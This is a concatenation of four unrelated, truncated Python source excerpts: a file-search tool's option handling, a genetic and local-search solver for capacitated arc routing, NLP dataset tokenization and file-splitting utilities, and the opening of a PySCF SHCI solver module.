self.y or self.tab or self.xl: from .jsonpath import JsonPath self.jsonpath = JsonPath(self.regex) # print(self.jsonpath) else: self.jsonpath = None # print(files) if not isinstance(files, str): # files is a list of (file/dir)names self.dirName = "" self.files = files else: # files is a directory/filename if os.path.isdir(files): # gorp from a directory self.dirName = files self.files = generateFileSet(files, self.d, self.r) else: self.dirName = "" if self.e: # 'e' option means you read files in from a JSON/YAML file use_yaml = get_ext(files) in {"yml", "yaml"} with open(files) as fhand: if use_yaml: try: import yaml self.files = yaml.safe_load(fhand) except ImportError: warn_first_import_error("yaml") else: self.files = json.load(fhand) else: # gorping a single file self.dirName = "" self.files = [files] self.resultset = {} if self.i: if self.o: def goodness_condition(line): out = [] for x in line.split(): mtch = re.fullmatch(regex, x, re.I) if mtch: out.append(mtch.string) return out self.goodness_condition = goodness_condition self.f_goodness_condition
import sys import queue import random import time import copy import numpy as np from multiprocessing import Process,Queue file_path=sys.argv[1] termin_time=sys.argv[3] random_seed=sys.argv[5] start=time.time() random.seed(random_seed) f=open(file_path,encoding='utf-8') sentimentlist = [] for line in f: s = line.strip().split('\t') slist=s[0].split() sentimentlist.append(slist) f.close() vertices=0 depot=0 required=0 non_required=0 vehicles=0 capacity=0 total_cost=0 edge_list=[] for i in sentimentlist: if i[0]=='VERTICES': vertices=int(i[2]) elif i[0]=='DEPOT': depot=int(i[2]) elif i[0]=='REQUIRED': required=int(i[3]) elif i[0]=='NON-REQUIRED': non_required=int(i[3]) elif i[0]=='VEHICLES': vehicles=int(i[2]) elif i[0]=='CAPACITY': capacity=int(i[2]) elif i[0]=='TOTAL': total_cost=int(i[6]) elif str.isdigit(i[0]): edge_list.append(i) class Node(object): def __init__(self, dis, index): self.dis = dis self.index = index def __lt__(self, other): if self.dis!=other.dis: return self.dis < other.dis elif self.dis==other.dis: p=np.random.rand() if p>0.5 :return True else: return False class Edge(object): def __init__(self, s, t ,c ,d ): self.s = s self.t = t self.c = c self.d = d def __lt__(self, other): if self.d!=other.d: return self.d < other.d elif self.d==other.d: p=np.random.rand() if p>0.5 :return True else: return False class Individual(object): def __init__(self, gene,q): self.gene=gene self.q=q def __lt__(self, other): return self.q < other.q class Graph: def __init__(self,n_vertices,depot,required,non_required,vehicles,capacity,total_cost,edge_list): self._n_vertices = n_vertices self._depot=depot self._required=required self._non_required=non_required self._vehicles=vehicles self._capacity=capacity self._total_cost=total_cost self._edge_list=edge_list self._all_distance= [[0 for _ in range(n_vertices+1)] for _ in range(n_vertices+1)] self._adj = [[] for _ in range(n_vertices+1)] self.cost_dic={} self.demand_dic={} self.task_dic={} self.id_dic={} idcounter=1 for i in self._edge_list: s=int(i[0]) t=int(i[1]) c=int(i[2]) d=int(i[3]) self.add_edge(s,t) self.add_edge(t,s) self.cost_dic[(s,t)]=c self.cost_dic[(t,s)]=c self.demand_dic[(s,t)]=d self.demand_dic[(t,s)]=d self.task_dic[idcounter]=(s,t) self.task_dic[-idcounter]=(t,s) self.id_dic[(s,t)]=idcounter self.id_dic[(t,s)]=-idcounter idcounter+=1 # for i in range(1,n_vertices+1): # for j in range(1,n_vertices+1): # self._all_distance[i][j]=self.dijkstra(i, j) for i in range(1,n_vertices+1): for j in range(1,n_vertices+1): if (i,j) in self.cost_dic: self._all_distance[i][j]=self.cost_dic[(i,j)] elif i==j: self._all_distance[i][j]=0 else: self._all_distance[i][j]=10000000000000 for k in range(1,n_vertices+1): for i in range(1,n_vertices+1): for j in range(1,n_vertices+1): if self._all_distance[i][j]> self._all_distance[i][k]+self._all_distance[k][j]: self._all_distance[i][j]=self._all_distance[i][k]+self._all_distance[k][j] # print(time.time()-start) self.tasklist=[] self.tasklist2=[] for i in self._edge_list: s=int(i[0]) t=int(i[1]) c=int(i[2]) d=int(i[3]) if d!=0: self.tasklist.append(Edge(s,t,c,d)) self.tasklist2.append([s,t,c,d]) def add_edge(self, s, t): self._adj[s].append(t) def dijkstra(self, s ,t): S=set() visit=set() disdic={} pq = queue.PriorityQueue() for i in range(1,self._n_vertices+1): if i !=s: disdic[i]=1000000000000 pq.put_nowait(Node(1000000000000,i)) else: disdic[i]=0 pq.put_nowait(Node(0,i)) while not pq.empty(): u = pq.get() u_index=u.index if u_index not in visit: if u_index==t: return u.dis visit.add(u_index) for i in self._adj[u_index]: if disdic[u_index]+self.cost_dic[(u_index,i)] <disdic[i]: pq.put_nowait(Node(disdic[u_index]+self.cost_dic[(u_index,i)],i)) disdic[i]=disdic[u_index]+self.cost_dic[(u_index,i)] def finish_one_task(self,s,t): cost_sum=0 cost_sum+=self._all_distance[self._depot][t] cost_sum+=self._all_distance[self._depot][s] cost_sum+=self.cost_dic[(s,t)] return cost_sum def gene_to_string(self,gene): sline='s ' first=True for i in gene: if i==[]: continue first_task=True for j in i: # j=self.task_dic[j] task=self.task_dic[j] # task=j if first: addstr=f'0,({task[0]},{task[1]})' sline=sline+addstr first=False first_task=False else: if first_task: addstr=f',0,({task[0]},{task[1]})' sline=sline+addstr first_task=False else: addstr=f',({task[0]},{task[1]})' sline=sline+addstr addstr=f',0' sline=sline+addstr return sline def gene_to_q(self,gene): q=0 for i in gene: now=self._depot for j in i: j=self.task_dic[j] # if self._all_distance[j[0]][now]!=0: # print(f'Dijkstra: go from {now} to {j[0]} and cost is {self._all_distance[j[0]][now]}') # print(f'Cost: go from {j[0]} to {j[1]} and cost is {self.cost_dic[j]}') q+=self._all_distance[j[0]][now] q+=self.cost_dic[j] now=j[1] # if now!= self._depot: # print(f'Dijkstra: go from {now} to {self._depot} and cost is {self._all_distance[now][self._depot]}') q+=self._all_distance[now][self._depot] # print('Next_Car') return f'q {q}' def get_q(self,gene): q=0 for i in gene: now=self._depot for j in i: j=self.task_dic[j] # print(f'Dijkstra: go from {now} to {j[0]} and cost is {self._all_distance[j[0]][now]}') # print(f'Cost: go from {j[0]} to {j[1]} and cost is {self.cost_dic[j]}') q+=self._all_distance[j[0]][now] q+=self.cost_dic[j] now=j[1] # if now!= self._depot: # print(f'Dijkstra: go from {now} to {self._depot} and cost is {self._all_distance[now][self._depot]}') q+=self._all_distance[now][self._depot] # print('Next_Car') return q def gene_output(self,gene): print(self.gene_to_string(gene[:])) print(self.gene_to_q(gene[:])) def get_gene(self): tasklist=queue.PriorityQueue() for i in self._edge_list: s=int(i[0]) t=int(i[1]) c=int(i[2]) d=int(i[3]) if d!=0: tasklist.put_nowait(Edge(s,t,c,d)) candidate=[] route=[] gene=[] now=self._depot task_sum=0 while not tasklist.empty(): while not tasklist.empty(): leastd=tasklist.get() if leastd.d+task_sum<=self._capacity: candidate.append(leastd) else: tasklist.put_nowait(leastd) break if len(candidate)==0: task_sum=0 gene.append(route) route=[] now=self._depot else: min_distance=1000000000 min_list=[] for i in range(len(candidate)): taski=candidate[i] disx=self._all_distance[taski.s][now] disy=self._all_distance[taski.t][now] if disx<min_distance : min_list=[] min_list.append((i,True)) min_distance=disx elif disx==min_distance: min_list.append((i,True)) min_distance=disx if disy<min_distance: min_list=[] min_list.append((i,False)) min_distance=disy elif disy==min_distance: min_list.append((i,False)) min_distance=disy k=random.randint(0,len(min_list)-1) min_index=min_list[k][0] min_s=min_list[k][1] min_task=candidate.pop(min_index) if not min_s: temp=min_task.s min_task.s=min_task.t min_task.t=temp for i in candidate: tasklist.put_nowait(i) candidate=[] task_sum+=min_task.d route.append(self.id_dic[(min_task.s,min_task.t)]) now=min_task.t gene.append(route) task_sum=0 now=self._depot return gene def get_gene2(self): tasklist=copy.deepcopy(self.tasklist2) route=[] gene=[] now=self._depot task_sum=0 while len(tasklist)>0: tasklist.sort(key = lambda x:min(graph._all_distance[now][x[0]],graph._all_distance[now][x[1]])) min_list=[] min_dis=min(self._all_distance[now][tasklist[0][0]],self._all_distance[now][tasklist[0][1]]) for i in tasklist: if min(self._all_distance[now][i[0]],self._all_distance[now][i[1]])==min_dis and i[3]+task_sum<self._capacity : min_list.append(i) if min_list==[]: task_sum=0 gene.append(route) route=[] now=self._depot continue np.random.shuffle(min_list) min_task=min_list[0] tasklist.remove(min_task) task_sum+=min_task[3] if self._all_distance[now][min_task[0]]<self._all_distance[now][min_task[1]]: route.append(self.id_dic[(min_task[0],min_task[1])]) else: route.append(self.id_dic[(min_task[1],min_task[0])]) now=min_task[1] if now==self._depot: task_sum=0 gene.append(route) route=[] gene.append(route) task_sum=0 now=self._depot return gene def single_insertion(self,gene,p,k1,k2,k3): routek=gene[k1] if len(routek)>1: pass else: k2=-1 if k2!=-1: task_k_index=routek.pop(k2) task_k=self.task_dic[task_k_index] rp=random.random() if rp < p: if len(routek)==0: insert_index=0 routek.append(task_k_index) else: insert_index=k3 if insert_index==0: after=self.task_dic[routek[insert_index]] disx=self._all_distance[self._depot][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][after[0]] disy=self._all_distance[self._depot][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][after[0]] if disx<disy: routek.insert(insert_index,self.id_dic[task_k]) else: routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])]) elif insert_index==(len(routek)-1): before=self.task_dic[routek[insert_index]] disx=self._all_distance[before[1]][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][self._depot] disy=self._all_distance[before[1]][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][self._depot] if disx<disy: routek.append(self.id_dic[task_k]) else: routek.append(self.id_dic[(task_k[1],task_k[0])]) else: before=self.task_dic[routek[insert_index-1]] after=self.task_dic[routek[insert_index]] disx=self._all_distance[before[1]][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][after[0]] disy=self._all_distance[before[1]][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][after[0]] if disx<disy: routek.insert(insert_index,self.id_dic[task_k]) else: routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])]) else: if routek==[]: gene.pop(k1) return gene def double_insertion(self,gene,p,k1,k2,k3): routek=gene[k1] if len(routek)>2: pass else: k2=-1 if k2!=-1: task_k_index=routek.pop(k2) task_k_index2=routek.pop(k2) task_k=self.task_dic[task_k_index] task_k2=self.task_dic[task_k_index2] rp=random.random() if rp < p: if len(routek)==0: routek.append(task_k_index) else: insert_index=k3 if insert_index== 0: after=self.task_dic[routek[insert_index]] disx=self._all_distance[self._depot][task_k[0]]+self._all_distance[task_k2[1]][after[0]] disy=self._all_distance[self._depot][task_k2[1]]+self._all_distance[task_k[0]][after[0]] if disx<disy: routek.insert(insert_index,self.id_dic[(task_k[0],task_k[1])]) routek.insert(insert_index,self.id_dic[(task_k2[0],task_k2[1])]) else: routek.insert(insert_index,self.id_dic[(task_k2[1],task_k2[0])]) routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])]) elif insert_index==(len(routek)-1): before=self.task_dic[routek[insert_index]] disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k2[1]][self._depot] disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k[0]][self._depot] if disx<disy: routek.append(self.id_dic[(task_k[0],task_k[1])]) routek.append(self.id_dic[(task_k2[0],task_k2[1])]) else: routek.append(self.id_dic[(task_k2[1],task_k2[0])]) routek.append(self.id_dic[(task_k[1],task_k[0])]) else: before=self.task_dic[routek[insert_index-1]] after=self.task_dic[routek[insert_index]] disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k2[1]][after[0]] disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k[0]][after[0]] if disx<disy: routek.insert(insert_index,self.id_dic[(task_k[0],task_k[1])]) routek.insert(insert_index,self.id_dic[(task_k2[0],task_k2[1])]) else: routek.insert(insert_index,self.id_dic[(task_k2[1],task_k2[0])]) routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])]) else: if routek==[]: gene.pop(k1) route=[] route.append(self.id_dic[(task_k[0],task_k[1])]) route.append(self.id_dic[(task_k2[0],task_k2[1])]) gene.append(route) return gene def swap(self,gene,k1,k2,k3): routek=gene[k1] if len(routek)>2: pass else: k2=-1 if k2!=-1: task_k_index=routek[k2] task_k_index2=routek[k3] task_k=self.task_dic[task_k_index] task_k2=self.task_dic[task_k_index2] if k2==0: after=self.task_dic[routek[k2+1]] disx=self._all_distance[self._depot][task_k2[0]]+self._all_distance[task_k2[1]][after[0]] disy=self._all_distance[self._depot][task_k2[1]]+self._all_distance[task_k2[0]][after[0]] if disx<disy: routek.pop(k2) routek.insert(k2,self.id_dic[(task_k2[0],task_k2[1])]) else: routek.pop(k2) routek.insert(k2,self.id_dic[(task_k2[1],task_k2[0])]) elif k2== len(routek)-1: before=self.task_dic[routek[k2-1]] disx=self._all_distance[before[1]][task_k2[0]]+self._all_distance[task_k2[1]][self._depot] disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k2[0]][self._depot] if disx<disy: routek.pop(k2) routek.insert(k2,self.id_dic[(task_k2[0],task_k2[1])]) else: routek.pop(k2) routek.insert(k2,self.id_dic[(task_k2[1],task_k2[0])]) else: before=self.task_dic[routek[k2-1]] after=self.task_dic[routek[k2+1]] disx=self._all_distance[before[1]][task_k2[0]]+self._all_distance[task_k2[1]][after[0]] disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k2[0]][after[0]] if disx<disy: routek.pop(k2) routek.insert(k2,self.id_dic[(task_k2[0],task_k2[1])]) else: routek.pop(k2) routek.insert(k2,self.id_dic[(task_k2[1],task_k2[0])]) if k3==0: after=self.task_dic[routek[k3+1]] disx=self._all_distance[self._depot][task_k[0]]+self._all_distance[task_k[1]][after[0]] disy=self._all_distance[self._depot][task_k[1]]+self._all_distance[task_k[0]][after[0]] if disx<disy: routek.pop(k3) routek.insert(k3,self.id_dic[(task_k[0],task_k[1])]) else: routek.pop(k3) routek.insert(k3,self.id_dic[(task_k[1],task_k[0])]) elif k3== len(routek)-1: before=self.task_dic[routek[k3-1]] disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k[1]][self._depot] disy=self._all_distance[before[1]][task_k[1]]+self._all_distance[task_k[0]][self._depot] if disx<disy: routek.pop(k3) routek.insert(k3,self.id_dic[(task_k[0],task_k[1])]) else: routek.pop(k3) routek.insert(k3,self.id_dic[(task_k[1],task_k[0])]) else: before=self.task_dic[routek[k3-1]] after=self.task_dic[routek[k3+1]] disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k[1]][after[0]] disy=self._all_distance[before[1]][task_k[1]]+self._all_distance[task_k[0]][after[0]] if disx<disy: routek.pop(k3) routek.insert(k3,self.id_dic[(task_k[0],task_k[1])]) else: routek.pop(k3) routek.insert(k3,self.id_dic[(task_k[1],task_k[0])]) return gene def list_2_tuple(self,lst): result=[] for i in lst: ti=tuple(i) result.append(ti) return tuple(result) def single_local_search(self,gene): before=1000000 best_q=1000000 best_gene=gene time_out=False while True: if time_out: break for i in range(len(gene)): if time_out: break if len(gene[i])>1: for j in range(len(gene[i])): if time_out: break for k in range(len(gene[i])-1): if time.time()-start>float(termin_time)-0.5: time_out=True if time_out: break copy_gene=copy.deepcopy(gene) self.single_insertion(copy_gene,1,i,j,k) q=self.get_q(copy_gene) if q<best_q: best_gene=copy_gene best_q=q if best_q==before: break else: before=best_q return best_gene def double_local_search(self,gene): before=1000000 best_q=1000000 best_gene=gene time_out=False while True: if time_out: break for i in range(len(gene)): if time_out: break if len(gene[i])>2: for j in range(len(gene[i])-1): if time_out: break for k in range(len(gene[i])-2): if time.time()-start>float(termin_time)-0.5: time_out=True if time_out: break copy_gene=copy.deepcopy(gene) self.double_insertion(copy_gene,1,i,j,k) q=self.get_q(copy_gene) if q<best_q: best_gene=copy_gene best_q=q if best_q==before: break else: before=best_q return best_gene def swap_local_search(self,gene): before=1000000 best_q=1000000 best_gene=gene time_out=False while True: if time_out: break for i in range(len(gene)): if time_out: break if len(gene[i])>2: for j in range(len(gene[i])): if time_out: break for k in range(len(gene[i])): if k!=j: if time.time()-start>float(termin_time)-0.5: time_out=True if time_out: break copy_gene=copy.deepcopy(gene) self.swap(copy_gene,i,j,k) q=self.get_q(copy_gene) if q<best_q: best_gene=copy_gene best_q=q if best_q==before: break else: before=best_q return best_gene def Ulusoy_split(self,ordered_list): V=[0 for i in range(len(ordered_list)+1)] P=[0 for i in range(len(ordered_list)+1)] length=len(ordered_list) for i in range(1,length+1): V[i]=1000000000 for t in range(1,length+1): i=t-1 j=i load=0 cost=0 before_task=None while j<length: task=self.task_dic[ordered_list[j]] load+=self.demand_dic[task] if i==j: cost=self._all_distance[self._depot][task[0]]+self.cost_dic[task]+self._all_distance[self._depot][task[1]] else: cost=self._all_distance[before_task[1]][task[0]]+self.cost_dic[task]+self._all_distance[self._depot][task[1]]-self._all_distance[self._depot][before_task[1]] if load<=self._capacity: v_new=V[t-1]+cost if v_new<V[j+1]: V[j+1]=v_new P[j+1]=t-1 before_task=task j+=1 else: break output=[] j=length ptr=P[j] while ptr>0: route=[] for k in range(ptr,j): route.append(ordered_list[k]) output.append(route) j=ptr ptr=P[j] route=[] for k in range(0,j): route.append(ordered_list[k]) output.append(route) return output def flatten(self,gene): output=[] for i in gene: for j in i: output.append(j) return output def merge(self,gene,list): output=[] left=[] for i in range(len(gene)): if i in list: output.append(gene[i]) else: left.append(gene[i]) return output,left def MS_local_search(self,gene): min_split=None min_left=None min_score=10000000000 counter=0 for i in range(len(gene)): for j in range(i+1,len(gene)): counter+=1 if counter>100: pass else: for i in range(5): random_select,left=graph.merge(gene,[i,j]) split1=graph.Ulusoy_split(graph.PS1(copy.deepcopy(graph.flatten(random_select)))) split2=graph.Ulusoy_split(graph.PS2(copy.deepcopy(graph.flatten(random_select)))) split3=graph.Ulusoy_split(graph.PS3(copy.deepcopy(graph.flatten(random_select)))) split4=graph.Ulusoy_split(graph.PS4(copy.deepcopy(graph.flatten(random_select)))) split5=graph.Ulusoy_split(graph.PS5(copy.deepcopy(graph.flatten(random_select)))) score1=self.get_q(split1) score2=self.get_q(split2) score3=self.get_q(split3) score4=self.get_q(split4) score5=self.get_q(split5) if score1<min_score: min_score=score1 min_split=split1 min_left=left if score2<min_score: min_score=score2 min_split=split2 min_left=left if score3<min_score: min_score=score3 min_split=split3 min_left=left if score4<min_score: min_score=score4 min_split=split4 min_left=left if score5<min_score: min_score=score5 min_split=split5 min_left=left for i in min_left: min_split.append(i) return min_split def best_BIH(self): population=queue.PriorityQueue() gene_set=set() counter=0 misstime=0 while time.time()-start<float(termin_time): copy_gene=self.get_gene2() tuple_gene=self.list_2_tuple(copy_gene) if tuple_gene not in gene_set: counter+=1 gene_set.add(tuple_gene) new_individual=Individual(copy_gene, self.get_q(copy_gene)) population.put_nowait(new_individual) misstime=0 else: misstime+=1 if misstime>100: break best=population.get() self.gene_output(best.gene) def cross_over(self,gene1,gene2): k1=random.randint(0,len(gene1)-1) k2=random.randint(0,len(gene2)-1) # print(k1) # print(k2) R1=gene1[k1] R2=gene2[k2] # print(f'R1 is {R1}') # print(f'R2 is {R2}') while len(R1)<2: k1=random.randint(0,len(gene1)-1) R1=gene1[k1] while len(R2)<2: k2=random.randint(0,len(gene2)-1) R2=gene2[k2] s1=random.randint(1,len(R1)-1) s2=random.randint(1,len(R2)-1) R11=R1[:s1] R22=R2[s2:] new=R11+R22 miss=[] dup=[] for i in new: if i not in R1: dup.append(i) for i in R1: if
# # Copyright (c) 2018, Salesforce, Inc. # The Board of Trustees of the Leland Stanford Junior University # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import json from json.decoder import JSONDecodeError import logging import os import shutil import random import time import re import numpy as np import torch from .data_utils.example import Batch from .data_utils.iterator import Iterator logger = logging.getLogger(__name__) ENTITY_MATCH_REGEX = re.compile('^([A-Z].*)_[0-9]+$') class SpecialTokenMap: def __init__(self, pattern, forward_func, backward_func=None): """ Inputs: pattern: a regex pattern forward_func: a function with signature forward_func(str) -> str backward_func: a function with signature backward_func(str) -> list[str] """ if isinstance(forward_func, list): self.forward_func = lambda x: forward_func[int(x)%len(forward_func)] else: self.forward_func = forward_func if isinstance(backward_func, list): self.backward_func = lambda x: backward_func[int(x)%len(backward_func)] else: self.backward_func = backward_func self.pattern = pattern def forward(self, s: str): reverse_map = [] matches = re.finditer(self.pattern, s) if matches is None: return s, reverse_map for match in matches: occurrence = match.group(0) parameter = match.group(1) replacement = self.forward_func(parameter) s = s.replace(occurrence, replacement) reverse_map.append((self, occurrence)) return s, reverse_map def backward(self, s: str, occurrence: str): match = re.match(self.pattern, occurrence) parameter = match.group(1) if self.backward_func is None: list_of_strings_to_match = [self.forward_func(parameter)] else: list_of_strings_to_match = sorted(self.backward_func(parameter), key=lambda x:len(x), reverse=True) for string_to_match in list_of_strings_to_match: l = [' '+string_to_match+' ', string_to_match+' ', ' '+string_to_match] o = [' '+occurrence+' ', occurrence+' ', ' '+occurrence] new_s = s for i in range(len(l)): new_s = re.sub(l[i], o[i], s, flags=re.IGNORECASE) if s != new_s: break if s != new_s: s = new_s break return s def find_span_type(program, begin_index, end_index): if begin_index > 1 and program[begin_index - 2] == 'location:': span_type = 'LOCATION' elif end_index == len(program) - 1 or not program[end_index + 1].startswith('^^'): span_type = 'QUOTED_STRING' else: if program[end_index + 1] == '^^tt:hashtag': span_type = 'HASHTAG' elif program[end_index + 1] == '^^tt:username': span_type = 'USERNAME' else: span_type = 'GENERIC_ENTITY_' + program[end_index + 1][2:] end_index += 1 return span_type, end_index def requote_program(program): program = program.split(' ') requoted = [] in_string = False begin_index = 0 i = 0 while i < len(program): token = program[i] if token == '"': in_string = not in_string if in_string: begin_index = i + 1 else: span_type, end_index = find_span_type(program, begin_index, i) requoted.append(span_type) i = end_index elif not in_string: entity_match = ENTITY_MATCH_REGEX.match(token) if entity_match is not None: requoted.append(entity_match[1]) elif token != 'location:': requoted.append(token) i += 1 return ' '.join(requoted) def tokenizer(s): return s.split() def mask_special_tokens(string: str): exceptions = [match.group(0) for match in re.finditer('[A-Za-z:_.]+_[0-9]+', string)] for e in exceptions: string = string.replace(e, '<temp>', 1) return string, exceptions def unmask_special_tokens(string: str, exceptions: list): for e in exceptions: string = string.replace('<temp>', e, 1) return string def detokenize(string: str): string, exceptions = mask_special_tokens(string) tokens = ["'d", "n't", "'ve", "'m", "'re", "'ll", ".", ",", "?", "!", "'s", ")", ":"] for t in tokens: string = string.replace(' ' + t, t) string = string.replace("( ", "(") string = string.replace('gon na', 'gonna') string = string.replace('wan na', 'wanna') string = unmask_special_tokens(string, exceptions) return string def tokenize(string: str): string, exceptions = mask_special_tokens(string) tokens = ["'d", "n't", "'ve", "'m", "'re", "'ll", ".", ",", "?", "!", "'s", ")", ":"] for t in tokens: string = string.replace(t, ' ' + t) string = string.replace("(", "( ") string = string.replace('gonna', 'gon na') string = string.replace('wanna', 'wan na') string = re.sub('\s+', ' ', string) string = unmask_special_tokens(string, exceptions) return string.strip() def lower_case(string): string, exceptions = mask_special_tokens(string) string = string.lower() string = unmask_special_tokens(string, exceptions) return string def get_number_of_lines(file_path): count = 0 with open(file_path) as f: for line in f: count += 1 return count def get_part_path(path, part_idx): if path.endswith(os.path.sep): has_separator = True path = path[:-1] else: has_separator = False return path + '_part' + str(part_idx+1) + (os.path.sep if has_separator else '') def split_folder_on_disk(folder_path, num_splits): new_folder_paths = [get_part_path(folder_path, part_idx) for part_idx in range(num_splits)] for subdir, dirs, files in os.walk(folder_path): for file in files: new_file_paths = [os.path.join(subdir.replace(folder_path, new_folder_paths[part_idx]), file) for part_idx in range(num_splits)] split_file_on_disk(os.path.join(subdir, file), num_splits, output_paths=new_file_paths) return new_folder_paths def split_file_on_disk(file_path, num_splits, output_paths=None): """ """ number_of_lines = get_number_of_lines(file_path) all_output_paths = [] all_output_files = [] for part_idx in range(num_splits): if output_paths is None: output_path = get_part_path(file_path, part_idx) else: output_path = output_paths[part_idx] all_output_paths.append(output_path) os.makedirs(os.path.dirname(output_path), exist_ok=True) all_output_files.append(open(output_path, 'w')) with open(file_path, 'r') as input_file: output_file_idx = 0 for line in input_file: all_output_files[output_file_idx].write(line) output_file_idx = (output_file_idx + 1) % len(all_output_files) for f in all_output_files: f.close() return all_output_paths def combine_folders_on_disk(folder_path_prefix, num_files, line_group_size, delete=False): folder_paths = [get_part_path(folder_path_prefix, part_idx) for part_idx in range(num_files)] new_to_olds_map = {} for i in range(num_files): for subdir, dirs, files in os.walk(folder_paths[i]): for file in files: new_file_path = os.path.join(subdir.replace(folder_paths[i], folder_path_prefix), file) if new_file_path not in new_to_olds_map: new_to_olds_map[new_file_path] = [] new_to_olds_map[new_file_path].append(os.path.join(subdir, file)) for new, olds in new_to_olds_map.items(): os.makedirs(os.path.dirname(new), exist_ok=True) with open(new, 'w') as combined_file: if new.endswith('.json'): new_json = None for old in olds: with open(old, 'r') as f: if new_json is None: try: new_json = json.load(f) except JSONDecodeError: f.seek(0) logger.info('Failed to read json file %s with content:\n %s', old, f.read()) else: for k, v in json.load(f).items(): new_json[k] += v for k, v in new_json.items(): new_json[k] /= float(num_files) json.dump(new_json, combined_file) else: all_old_file_contents = [] for old in olds: with open(old, 'r') as f: all_old_file_contents.append([line for line in f]) old_file_idx = 0 all_indices = [0] * len(all_old_file_contents) finished_reading = [False] * len(all_old_file_contents) while True: if finished_reading[old_file_idx]: old_file_idx = (old_file_idx + 1) % len(all_old_file_contents) continue for i in range(line_group_size): line = all_old_file_contents[old_file_idx][all_indices[old_file_idx]] combined_file.write(line) all_indices[old_file_idx] += 1 if all_indices[old_file_idx] == len(all_old_file_contents[old_file_idx]): finished_reading[old_file_idx] = True if all(finished_reading): break old_file_idx = (old_file_idx + 1) % len(all_old_file_contents) if delete: for folder in folder_paths: shutil.rmtree(folder) def combine_files_on_disk(file_path_prefix, num_files, line_group_size, delete=False): all_input_file_contents = [] all_input_file_paths = [] for i in range(num_files): input_file_path = get_part_path(file_path_prefix, i) all_input_file_paths.append(input_file_path) with open(input_file_path, 'r') as f: all_input_file_contents.append([line for line in f]) all_indices = [0] * len(all_input_file_contents) finished_reading = [False] * len(all_input_file_contents) input_file_idx = 0 with open(file_path_prefix, 'w') as combined_file: while True: if finished_reading[input_file_idx]: input_file_idx = (input_file_idx + 1) % len(all_input_file_contents) continue for i in range(line_group_size): line = all_input_file_contents[input_file_idx][all_indices[input_file_idx]] combined_file.write(line) all_indices[input_file_idx] += 1 if all_indices[input_file_idx] == len(all_input_file_contents[input_file_idx]): finished_reading[input_file_idx] = True if all(finished_reading): break input_file_idx = (input_file_idx + 1) % len(all_input_file_contents) if delete: for file_path in all_input_file_paths: os.remove(file_path) def map_filter(callable, iterable): output = [] for element in iterable: new_element = callable(element) if new_element is not None: output.append(new_element) return output def preprocess_examples(args, tasks, splits, logger=None, train=True): min_length = 1 max_context_length = args.max_train_context_length if train else args.max_val_context_length is_too_long = lambda ex: (len(ex.answer) > args.max_answer_length or len(ex.context) > max_context_length) is_too_short = lambda ex: (len(ex.answer) < min_length or len(ex.context) < min_length) for task, s in zip(tasks, splits): if logger is not None: logger.info(f'{task.name} has {len(s.examples)} examples') l = len(s.examples) s.examples = map_filter( lambda ex: task.preprocess_example(ex, train=train, max_context_length=max_context_length), s.examples) if train: l = len(s.examples) s.examples = [ex for ex in s.examples if not is_too_long(ex)] if len(s.examples) < l: if logger is not None: logger.info(f'Filtering out
<gh_stars>1-10 #!/usr/bin/env python # Copyright 2014-2019 The PySCF Developers. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Author: <NAME> # <NAME> # ''' SHCI solver for CASCI and CASSCF. Cornell SHCI program Arrow is developed by <NAME>, <NAME>. You'll need to contact <NAME> to get the program. ''' import os import sys import json import time import tempfile import copy import glob import shutil from subprocess import check_call, check_output, CalledProcessError import numpy from pyscf.lib import logger from pyscf import lib from pyscf import tools from pyscf import ao2mo from pyscf import mcscf from pyscf.cornell_shci import symmetry # Settings try: from pyscf.cornell_shci import settings except ImportError: from pyscf import __config__ settings = lambda: None settings.SHCIEXE = getattr(__config__, 'shci_SHCIEXE', None) settings.SHCIRUNTIMEDIR = getattr(__config__, 